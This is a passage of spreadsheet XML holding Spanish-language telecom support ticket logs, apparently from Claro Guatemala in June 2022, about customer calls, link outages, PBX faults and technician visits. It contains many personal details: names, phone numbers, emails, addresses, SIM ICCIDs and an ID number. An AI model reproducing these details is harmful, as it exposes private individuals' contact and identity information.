CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE OMNILIFE INTERNATIONAL-OMNILIFE CEDIS AGUILAR BATRES-341500017- PACKETLOSS || IMOMF000317
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE HABLÓ CON EDGAR HERNÁNDEZ/CLIENTE 00 525551745299 INDICA QUE NO HA TENIDO RESPUESTA DE SU CLIENTE FINAL, PIDE SE LE LLAME MAÑANA A LAS 10:00AM PARA AVANCES.</t>
  </si>
  <si>
    <t>F4615585</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSÉ VELASQUEZ AL 56973660 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001111713
**</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN COMPLETA LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4615587</t>
  </si>
  <si>
    <t>SE HABLÓ CON JOSÉ FUENTES/CLIENTE 42187322 SE LE INDICA QUE DEL LADO NUESTRO TODO OK, ÉSTE INDICA QUE REALIZARÁ SUS PRUEBAS INTERNAS, PIDE SE CIERRE TICKET.
CALL ID CALL ID 2001159734</t>
  </si>
  <si>
    <t>F4615603</t>
  </si>
  <si>
    <t>SE ENCONTRO NUMERO EN TT ANTERIORES DE ELVIS FLORES 40713638 PARA COORDINAR UNA VISITA PERO NO SE LOGRA COMUNICACION
ID
RESULTADO: LLAMADA HECHA
NOMBRE: 40713638
NÚMERO: 55280199
INICIO: HOY, 15:25
FIN: HOY, 15:26
DURACIÓN: 0:47
ID DE LLAMADA: 2001296262</t>
  </si>
  <si>
    <t>F4615613</t>
  </si>
  <si>
    <t>SE LE INFORMA AL CLIENTE FERNANDO 56987952 QUE NOS AUTORIZARON EL ACCESO PARA MAÑANA A LAS 9 AM. CLIENTE QUEDA ENTERADO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO 56987952 SOLICITA QUE SE CONSULTE CON MANFRED COTO PARA VALIDAR. ID DE LLAMADA: 3001147144</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 506 60523172 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE. HAY SEGUIMIENTO VÍA CORREO:
ASUNTO: RE: F4615613// GDN 24112100// FEDERAL EXPRESS GUATEMALA S.A</t>
  </si>
  <si>
    <t>CLIENTE FERNANDO 56987952 INDICA QUE TIENE INCONVENIENTES CON SU SERVICIO DE INTERNET, YA QUE LE DA INCONVENIENTE A ESTAS HORAS DEL MEDIO DÍA, VALIDA QUE EL E1 SE ENCUENTRA OPERATIVO. ID: 2001113605</t>
  </si>
  <si>
    <t>SE HABLÓ CON MANFRED COTO/CLIENTE 506 60523172 INDICA QUE NO PUDO REALIZAR SUS PRUEBAS INTERNAS, PIDE SE LE LLAME MAÑANA A LAS 10:00AM PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA EN COSTA RICA Y NO PUEDE MARCAR AL NÚMERO, INTENTA LLAMAR A UN CONTACTO DE GUATEMALA PERO NO RESPONDEN PARA REALIZAR PRUEBAS. SE VERIFICÓ CON JOSUE SIAM DE CX Y LA LLAMADA COMPLETA, POR LO QUE ESTÁ PENDIENTE QUE CLIENTE VERIFIQUE. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE MANFRED COTO 506 60523172 REALIZA PRUEBAS E INDICA QUE LA LLAMADA AÚN NO COMPLETA, INDICA QUE MARCAN EL 180100 FEDEX</t>
  </si>
  <si>
    <t>SE LLAMA AL OTRO CONTACTO MANFREDO COTO 506 60523172 QUIEN INDICA QUE EL SERVICIO DEL 1801 NO ESTÁ RECIBIENDO LLAMADAS, INDICA QUE SE LLAMA LOCALMENTE EN GUATEMALA PERO NO ENTRAN LAS LLAMADAS. ID DE LLAMADA: 2001116691</t>
  </si>
  <si>
    <t>SE LE INFORMA A CLIENTE FERNANDO 56987952 QUE POSIBLEMENTE EL INCONVENIENTE VENGA DE SU PLANTA PBX. A SOLICITUD DE CONMUTACIÓN SE COORDINARÁ VISITA TÉCNICA CON EMULADOR. CLIENTE INDICA QUE ATIENDE HASTA LAS 4 PM.
DIRECCIÓN: AVENIDA DEL FERROCARRIL 19-97 ZONA 12 COMPLEJO EL CORTIJO 1 BODEJA 806</t>
  </si>
  <si>
    <t>CLIENTE FERNANDO 56987952 INDICA QUE NO HAY NADIE EN SUS INSTALACIONES EN GUATEMALA DURANTE EL FIN DE SEMANA. PARA REALIZAR PRUEBAS SOLICITA SE LE LLAME EL DÍA LUNES. ID DE LLAMADA: 2001267575</t>
  </si>
  <si>
    <t>CLIENTE MANFRED COTO 506 60523172 INDICA QUE AUN NO HA PODIDO VALIDAR LAS LLAMADAS, SOLICITA SE LE LLAME MAS TARDE.
2001240081
COLA:
NOMBRE: A: 0050660523172
NÚMERO: 0050660523172
DURACIÓN: 0:06:39
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050660523172
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 25/06/2022 10:55:34 A. M.</t>
  </si>
  <si>
    <t>CLIENTE LUIS FERNANDO APOYA A UBICAR EQUIPO ASMI52 EL CUAL ESTÁ SINCRONIZADO SIN ALARMAS, CLIENTE TIENE VARIOS EQUIPOS CISCO Y NO SABE CUAL ES EL QUE MANEJA LAS LLAMADAS POR LO QUE NO PUEDE REINICIARLO. ID DE LLAMADA: 2001438404</t>
  </si>
  <si>
    <t>F4615618</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 24 DE JUNIO DE 2022 16:53
PARA: MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4615618 || INESTABILIDAD Y CARGA C650 ||
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4615663</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JAIRO SORIANO 46340526 CONFIRMA Y VALIDA ENLACE, ADICIONAL ESTARA ESCALANDO A SU EJECUTIVO DE CUENTA PARA QUE PUEDAN MIGRAR SU ENLACE A INFRAESTRUCTURA INDEPENDIENTE MANTENIENDO EL MISMO DIRECCIONAMIENTO IP. SE PROCEDE AL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>F4615694</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO RODENA AL 58127816 CONTESTAN PERO INDICAN QUE ES NUMERO EQUIVOCADO**
-ID 2001153573 - 2001153634
**</t>
  </si>
  <si>
    <t>F4615695</t>
  </si>
  <si>
    <t>SE HABLÓ CON EDGAR HERNÁNDEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, PIDE SE LE COMPARTA PRUEBAS DONDE ENLACE OK, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE DE LO DICHO POR CLIENTE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR GILBERTO ROMANO E INDCIA QUE QUIERE QUE SE REVISE MAS A DETALLE YA QUE LA BGP ESTUVO FLAPEANDO  CL ESTA PIDIENDO DETALLES || SE NOTIFICA A GESTOR **
-ID 2001154332
**</t>
  </si>
  <si>
    <t>F4615730</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 18:45 HORAS A SOLICITUD DE CLIENTE, NO APLICA A PENDIENTE CLIENTE; SE PIDE A GESTIÓN N1 VÍA SKYPE MOVER TICKET A ESTADO DE MONITOREO.</t>
  </si>
  <si>
    <t>F4615736</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 9:19
PARA: WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; MAGARCIA@MP.GOB.GT &lt;MAGARCIA@MP.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: MINISTERIO PUBLICO || ENLACE || 917800001T
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4615737</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RICARDO MARCIANO QUIEN INDICA QUE EL ASMI NO ESTA ALARMADO.
EL CLIENTE APAGO EL ASMI Y LA ALARMA CAMBIO A AIS. ENCENDIO EL EQUIPO Y SE OBSERVA LA MISMA ALARMA NUEVAMENTE.
CLIENTE INDICA QUE SE RETIRA A LAS 17:00RS.
2001132031
COLA:
NOMBRE: A: 0050370804942
NÚMERO: 0050370804942
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050370804942
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 14:51:54</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE VALIDA CON EL CLIENTE RICARDO.
2001144597
COLA:
NOMBRE: A: 0050323276100
NÚMERO: 0050323276100
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 0050323276100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 15:31:33</t>
  </si>
  <si>
    <t>F4615738</t>
  </si>
  <si>
    <t>SE HABLO CON SR. MANUEL GARCIA 56331989  INFORMA QUE CONTINUA LA INESTABILIDAD CON SUS APLICACIONES, SE LE RECOMIENDA REALIZAR EL LISTADO DE LAS AGENCIAS DONDE NO LE ES FACTIBLE TRABAJAR CON 3G Y ESCALAR A SU EJECUTIVO DE CUENTA PARA EVALUAR LA MIGRACION DE MEDIO A FIBRA OPTICA, CONFIRMA DE ENTERADO ESCALARA CON SU EJECUTIVO DE CUENTA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL GARCIA 56331989 MENCIONA QUE EN PR NO HAY MUCHA SEÑAL, CLIENTE INDICA QUE EL SERVICIO  SE ENCUENTRA EN UN LUGAR MONTAÑOSO
MENCIONA QUE VALIDARA CON PR SOLICITA LLAMADA EN 10 MIN
-ID 2001138207</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN SALAZAR - 41005703 MENCIONA QUE PERSISTE EL PROBLEMA DE LENTITUD, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001144362 - 2001144477</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL GARCIA 56331989 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO DE  IVAN SALAZAR - 41005703
-ID 2001143684</t>
  </si>
  <si>
    <t>F4615799</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE SE VALIDA QUE CENTRAL YA NO SE ENCUENTRAN EN LAS INSTALACIONES POR L OQUE SE AGREGA A JORGE A LA COLA DE CORREOS, SE LE COMENTA QUE TENCICOS ESTARAN LLEGANDO A SITIO EN APROXIMADAMENTE 10 MINUTOS
JDELEON73REU@YAHOO.ES
2001176123
COLA:
NOMBRE: A: 56519073
NÚMERO: 56519073
DURACIÓN: 0:01:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 56519073
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 24/06/2022 17:30:54</t>
  </si>
  <si>
    <t>F4615812</t>
  </si>
  <si>
    <t>MARIO BARAHONA-70695944 ## SE TIENE EN LINEA ## VIVO</t>
  </si>
  <si>
    <t>CLEINTE MARIO BARAHONA-70695944  INDICA QUE LO QUE REPORTA ES 1 LINEA- COMENTA QUE TODAS LAS DEMAS LINEAS ESTAN BIEN- ##POR LO QUE SE LE INDICA QUE CALRO NO VE EXTENSIONES Y QU EDEBE ESCALAR SU PROBLEMA A NIVEL INTERNO""## A NIVEL DE CLARO TODO OK ##VIVO</t>
  </si>
  <si>
    <t>F4615841</t>
  </si>
  <si>
    <t>CLIENTE BRENDA BONILLA 77495807 REALIZA PRUEBAS Y VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO.
ID: 2001226088</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE BRENDA BONILLA 77495807 QUIEN APOYA A UBICAR UN EQUIPO ASMI EL CUAL NO TIENE NINGUNA LUZ ENCENDIDA, CLIENTE APOYA A REINICIAR PERO NO RESPONDE, INDICA QUE NO PUEDE CONECTARLO A OTRO TOMACORRIENTE YA QUE ESTÁ PEGADO A LA PARED, SOLICITA VISITA PARA MAÑANA A LAS 8 YA QUE SE RETIRAN A LAS 5 PM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4615870</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MANUEL ORTIZ QUIEN INDICA QUE CONTINUAN CORTANDOSE LAS LLAMADAS.
YA SE RETIRARON DE LABORES Y SOLICITA QUE SE REALICEN PRUEBAS EL DIA LUNES O YA SEA QUE SE ENVIE PERSONAL TECNICO A REVISAR NUEVAMENTE.
2001164743
COLA:
NOMBRE: A: 0050378601361
NÚMERO: 0050378601361
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: 0050378601361
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 16:38:37</t>
  </si>
  <si>
    <t>F4615952</t>
  </si>
  <si>
    <t>CLIENTE CARLOS GUERRERO INDICA QUE AUN NO ENCUENTRA SUS CREDENCIALES PERO SOLICITA VISITA TÉCNICA PARA CERTIFICAR EL COBRE.</t>
  </si>
  <si>
    <t>CLIENTE CARLOS GUERRERO 56969000 INDICA QUE ESCALARÁ CON SU PROVEEDOR YA QUE PBX NO ESTÁ ENVIANDO EL REGISTRO A LA CENTRAL. SOLICITA SE LE LLAME MAÑANA A LAS 8 AM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE REVISAN EQUIPOS CON EL CLIENTE  CARLOS GUERRERO 56969000, TIENE UN ASMI54L EL CUAL ESTÁ SINCRONIZADO, SE REINICIA PLANTA PBX DEL CLIENTE PERO SERVICIO CONTINÚA SIN REGISTRARSE. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE CARLOS GUERRERO 56969000 VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001264477</t>
  </si>
  <si>
    <t>CLIENTE CARLOS GUERRERO 56969000 ESTARÁ COMUNICANDOSE CON SU EJECUTIVA PARA SOLICITAR SUS CREDENCIALES YA QUE NO LAS POSEE. LUEGO SE COORDINARÁ LA VISITA PARA CERTIFICAR EL E1. CLIENTE ENTERADO SE DARÁ SEGUIMIENTO EL DÍA LUNES.  ID: 2001264477</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE CARLOS GARRIDO 56969000, INDICA QUE EL PUEDE ESTAR A LAS 11:30 AM PARA VISITA DEL TÉCNICO, SE LE COMENTA QUE PARA LA VISITA ES NECESARIO QUE TENGA A LA MANO SUS CREDENCIALES DEL E1, CLIENTE INDICA QUE PROCEDERÁ A BUSCARLAS YA QUE NO LAS TIENE, SE LE LLAMARÁ EN BREVE.
ID DE LLAMADA: 2001230878</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE CARLOS GUERRERO 56969000 QUIEN COMENTA QUE YA VERIFICÓ CON SU PROVEEDOR Y NO VEN INCONVENIENTES, SE LE CONSULTA AL CLIENTE SI HAY PERSONAL EN SITIO PARA ENVIAR A CERTIFICAR EL SERVICIO, COMENTA QUE VA A CONSULTAR Y SE LE LLAME EN 15 MINUTOS. ID DE LLAMADA: 2001209408</t>
  </si>
  <si>
    <t>F4616018</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JENNIFER GARCÍA, QUIEN INDICA QUE EL SERVICIO ESTA ACTIVO Y LLAMO DESDE LA MAÑANA A CC PARA CANCELAR EL TICKET.
CLIENTE SOLICITA EL CIERRE.
2001190571
COLA:
NOMBRE: A: 41219004
NÚMERO: 41219004
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 41219004
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 19:17:40</t>
  </si>
  <si>
    <t>F4616061</t>
  </si>
  <si>
    <t>SE SOLICITA A CLIENTE, CONTACTOS DE PUNTO REMOTO Y HORARIO DE ATENCION PARA PRUEBAS DE PRIMER NIVEL
SN-CA&amp;C || CS0252636|| P1 || TIGO || SENCINET 44848 - ANDA SISTEMA GALUCHAPA || ENLACE CAIDO || CTT-20220624-00000074 || ESCALAMIENTO SENCINET
ELVYN ARIEL LOPEZ RECINOS
BUEN DÍA ESTIMADO CLIENTE;
SU APOYO EN COMPARTIR CONTACTOS DE PUNTO REMOTO Y HORARIO DE ATENCIÓN, SE NECESITA REALIZAR PRUEBAS DE PRIMER NIVEL
SALUDOS</t>
  </si>
  <si>
    <t>F4616086</t>
  </si>
  <si>
    <t>SE RECIBE RESPUESTA DE EJECUTIVA DARLING COMPARTIENDO LA INFORMACION NUEVAMENTE, INDICA QUE LA SIM DE LA ETIQUETA EN CPE NO LE REGISTRA CON LA DIRECCIÓN DEL SERVICIO
DARLING ELISABET ALVAREZ IBOY
BUENAS TARDES, KENNY
ENVÍO NUEVAMENTE LA INFORMACIÓN:
ID 47503594
50255178976_KM 37.2 RUTA A SAN VICENTE PACAYA PARQUE INDUSTRIAL MICHATOYA SECTOR B1 ESCUINTLA_CORPORACION ALCATEXTIL
REDUNDANCIA 3G INALAMBRICA
RENTA : 23.25
REGISTRADA CON SIM: 8950201017773015648F
EL SIGUIENTE NO ME REGISTRA CON LA DIRECCIÓN DEL SERVICIO
"TEL 42721737 ICC 8950201016713540863F/_/47503594T/_/" YA QUE COMO VEMOS ES DISTINTO AL QUE DEBERÍA TENER CONFIGURADO</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA MAÑANA 10 HRS || PENDIENTE QUE CLIENTE CONFIRMEN
ASUNTO: VISITA TÉCNICA ATM4552 || WANREDUNDANTE/_/47503594T/_/KM 37.2 RUTA A SAN VICENTE PACAYA
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO ATM4552 || WANREDUNDANTE/_/47503594T/_/KM 37.2 RUTA A SAN VICENTE PACAYA PARQUE INDUSTRIAL MICHATOYA SECTOR B1 ESCUINTLA_CORPORACION ALCATEXTIL . LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL ENLACE REDUNDANTE DE LA AGENCIA POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO QUE ATENDERÁ LA VISITA EL DÍA DE MAÑANA VIERNES 31/03 A PARTIR DE LAS 10:00 HRS.
ADJUNTO LOS DATOS DEL PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>F4616289</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, AUDIO PÉSIMO/CIC SIN AUDIO; SE DEBE INTENTAR MÁS TARDE. CALL CENTER NO ESTÁ INCLUÍDO EN LA COLA DE CORREOS, SE PIDE A GESTIÓN N1 VÍA SKYPE QUE NOS INCLUYAN.</t>
  </si>
  <si>
    <t>F4616350</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 27 DE JUNIO DE 2022 8:45
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;; WALTER ROBERTO LOPEZ AGUSTIN &lt;WALTERR.LOPEZ@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 30900010T ::: TICKET CNOC IMKEC000109 ::: "FUERA DE SERVICIO"
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA ILEANA RAMOS INDICA QUE CL AUN NO HA VALIDADO**
-ID 2001505773
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 525551745290  CONTESTA EL SEÑOR RODRIGO NUÑEZ INDICA QUE CLIENTE AUN NO LE HA VALIDADO Y QUE CUANDO TENGA RESPUESTA DE CLIENTE NOS ESTARAN RESPONDIENDO **
-ID 2001423283
**</t>
  </si>
  <si>
    <t>F4616417</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO INDICADO EN BITACORA PARA CONSULTAR HORARIOS PARA LA VISITA TECNICA, SIN EMBARGO NO HAY RESPUESTA, SE LLAMARA NUEVAMENTE EN UN MOMENTO.
&lt;2001350301
COLA:
NOMBRE: A: 50372112657
NÚMERO: 50372112657
DURACIÓN: 0:00:48
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50372112657
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/06/2022 10:26:53</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE EDWIN PEREZ  503 72112657 SIN EMBARGO NO SE TIENE RESPUESTA
2001369541
COLA:
NOMBRE: A: 50372112657
NÚMERO: 50372112657
DURACIÓN: 0:00:48
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 50372112657
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/06/2022 12:37:21</t>
  </si>
  <si>
    <t>F4616426</t>
  </si>
  <si>
    <t>SE TIENE LOS SIGUIENTES CONTACTOS DEL PR, SE PROCEDE A LLAMAR AL CLIENTE.
TELÉFONO	PBX 23083000 EXT. 080622, 080623, 080624 - 52047356, 52056236</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL CLIENTE, RESPONDE DANIEL SUBGERENTE DE LA AGENCIA, DONDE ME APOYA PERO EL ROUTER Y CONEXIONES ESTAN EN TEL TECHO CON LO CUAL SE LE COMPLICA A LA HORA DE VALIDAR. EN ESTE CASO SE PROCEDE A ENVIAR PERSONAL TECNICO AL SITIO.
RESULTADO: LLAMADA HECHA
NOMBRE: 52056236
NÚMERO: 52056236
INICIO: HOY, 09:53
FIN: HOY, 10:03
DURACIÓN: 10:11
ID DE LLAMADA: 2001455759</t>
  </si>
  <si>
    <t>F4616431</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO TIENE GESTION DE LA SALA DONDE SE ENCUENTRA LOS EQUIPOS, SOLICITA QUE SE LE CONTACTE DESPUES DE LAS 8:15 YA QUE A ESA HORA LLEGA UNA PERSONA ENCARGADA PARA DAR ACCESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CRISTIAN ALVAREZ 41516681
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE RONY NOS HACE CONFERENCIA CON PERSONAL EN PUNTO ENCARGADO DE EQUIPOS, NOS APOYA CON REINICIAR EL EQUIPO AETHRA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CRISTIAN ALVAREZ 41516681
#3LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CRISTIAN ALVAREZ 41516681 PARA VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4616443</t>
  </si>
  <si>
    <t>AUN NO SE TIENE RESPUESTA AL CORREO QUE SE ENVIO, SE HA LLAMADO A ANIBAL GONZALEZ PARA CONSULTARA UNA FECHA TENTATIVA DE INSTALACION DEL UPS EN AGENCIA, INDICA QUE EL PROCESO NO LO VEN ELLOS EL AREA DE TELECOMUNICACIONES,  COMENTA QUE  EL GERENTE SOLICITA EL DISPOSITIVO EN ESTE CASO UN UPS, POR LO QUE SE LLAMARA NUEVAMENTE A LA AGENCIA EN HORARIO HABIL PARA CONSULTAR FECHA TENTATIVA CUANDO SUSTITUIRAN UPS EN MAL ESTADO.
RESULTADO: LLAMADA HECHA
NOMBRE: 57081768
NÚMERO: 011 50257081768
INICIO: HOY, 17:16
FIN: HOY, 17:23
DURACIÓN: 7:42
ID DE LLAMADA: 2001604188</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA CONTESTA GERENTE LUISA, INDICA QUE YA REALIZO LA GESTION DE SOLICITUD DE UPS QUE LA TRABAJARAN CON UNA OT INDICA QUE APROXIMANDAMENTE LO LLEGARAN A INSTALAR EN EL TRANSCURSO DE LA OTRA SEMANA.
RESULTADO: LLAMADA HECHA
NOMBRE: 25041515
NÚMERO: 25041515
INICIO: HOY, 16:00
FIN: HOY, 16:13
DURACIÓN: 12:19
ID DE LLAMADA: 3001009637</t>
  </si>
  <si>
    <t>F4616450</t>
  </si>
  <si>
    <t>PR INDICA QUE EL PROBLEMA ES A LAS 21:00 HORAS, CRONO ANTERIOR INDICA SEGUIMIENTO PARA HOY A TAL HORA.</t>
  </si>
  <si>
    <t>SE HABLÓ CON BRAULIO ORELLANA/CLIENTE 23623266 INDICA QUE HASTA EL MOMENTO TODO OK, PERO HA ESTADO MUY INESTABLE EL SERVICIO TODA LA SEMANA; PIDE SE MANTENGA EL TICKET ABIERTO Y DE PERSISTIR LO REPORTADO PIDE SE COORDINE VISITA TÉCNICA MAÑANA A LAS 21:00 HORAS. SE INFORMA DE LO ANTERIOR A CNOC CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4616460</t>
  </si>
  <si>
    <t>CLIENTE BRAYAN CASTELLANOS 58097654 REPORTA QUE NO PUEDE LLAMAR DESDE EL GDN HACIA LOS SIGUIENTES NÚMEROS, INDICA QUE DESPUES DE 10 INTENTOS COMPLETAN LAS LLAMADAS. DOS NÚMEROS SON DE GUATEMALA CON ROAMING Y EL OTRO ES DE PANAMÁ. ID:2001211476
 00-50223185277
00-50231670177
00-50766193672</t>
  </si>
  <si>
    <t>SE HABLÓ CON BRYAN CASTELLANOS/CLIENTE 35121369 INDICA QUE REALIZARON PRUEBAS, HASTA EL MOMENTO TODO OK, PIDE SE CIERRE TICKET.
CALL ID 2001290382</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN CASTELLANOS 58097654  QUIEN COMENTA QUE EN ESTE MOMENTO NO ESTA DISPONIBLE PARA REALIZAR PRUEBAS EN CONJUNTO, SOLICITA SE LE LLAME A PARTIR DE LAS 2 PM ID: 2001271786</t>
  </si>
  <si>
    <t>F4616467</t>
  </si>
  <si>
    <t>SE ENVIA CORREO ,  PENDIENTE DE ACCESOS DE CLIENTE
GESTION DE ACCESOS F4616467 | IDG002506SV | ACCESO FINANCIERO LTDA DE CV |SAN FRANCISCO MENENDEZBO. EL CALVARIO CALLE PRINCIPAL NO. 2 B AV NORTE AHUCHAPAN
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:JAVIER.LOPEZ@ACCESOFINANCIERO.COM.SV
CC:GRUPO N1;CNOCCA
SÁB 25/06/2022 13:46
BUEN DIA  ESTIMADO CLIENTE ,
GUSTO ESA SALUDARLE , SOLICITANDO DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA AREA TECNICA  PARA TRABAJAR SERVICIO DE  F4616467 | IDG002506SV | ACCESO FINANCIERO LTDA DE CV |SAN FRANCISCO MENENDEZBO. EL CALVARIO       CALLE PRINCIPAL       NO. 2 B               AV NORTE AHUCHAPAN | ,  SOLICITAMOS  DE SU AMABLE  APOYO GESTIONANDO ACCESO DIA LUNES 27/06/2022 A  LAS  08:00 AM
TRAMITAR PERMISOS PARA LOS TÉCNICOS :
02726611-4 FERNANDO JOSE LINARES
